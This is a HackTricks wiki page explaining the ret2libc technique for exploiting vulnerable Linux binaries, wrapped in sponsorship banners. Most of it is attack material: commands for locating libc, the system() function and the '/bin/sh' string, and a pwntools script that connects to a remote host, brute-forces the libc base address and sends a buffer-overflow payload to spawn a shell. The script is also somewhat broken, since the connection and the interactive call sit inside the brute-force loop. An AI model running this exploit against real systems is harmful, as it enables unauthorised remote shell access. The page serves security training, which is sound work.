hacktricks/exploiting/linux-exploiting-basic-esp/ret2lib.md
2022-04-28 15:23:35 +00:00

4 KiB

Support HackTricks and get benefits! Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](7af18b62b3/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.** **Share your hacking tricks submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
# Ret2Lib

If you have found a vulnerable binary and you think that you can exploit it using Ret2Lib here you can find some basic steps that you can follow.

If you are inside the host

You can find the address of libc

ldd /path/to/executable | grep libc.so.6 #Address (if ASLR, then this change every time)

If you want to check if the ASLR is changing the address of libc you can do:

for i in `seq 0 20`; do ldd <Ejecutable> | grep libc; done

Get offset of system function

readelf -s /lib/i386-linux-gnu/libc.so.6 | grep system

Get offset of "/bin/sh"

strings -a -t x /lib/i386-linux-gnu/libc.so.6 | grep /bin/sh

/proc/<PID>/maps

If the process is creating children every time you talk with it (network server) try to read that file (probably you will need to be root).

Here you can find exactly where is the libc loaded inside the process and where is going to be loaded for every children of the process.

In this case it is loaded in 0xb75dc000 (This will be the base address of libc)

Using gdb-peda

Get address of system function, of exit function and of the string "/bin/sh" using gdb-peda:

p system
p exit
find "/bin/sh"

Bypassing ASLR

You can try to bruteforce the abse address of libc.

for off in range(0xb7000000, 0xb8000000, 0x1000):

Code

from pwn import *

c = remote('192.168.85.181',20002)
c.recvline()    #Banner

for off in range(0xb7000000, 0xb8000000, 0x1000):
    p = ""
    p += p32(off + 0x0003cb20) #system
    p += "CCCC" #GARBAGE
    p += p32(off + 0x001388da) #/bin/sh
    payload = 'A'*0x20010 + p
    c.send(payload)
    c.interactive() #?
Support HackTricks and get benefits! Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](7af18b62b3/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.** **Share your hacking tricks submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**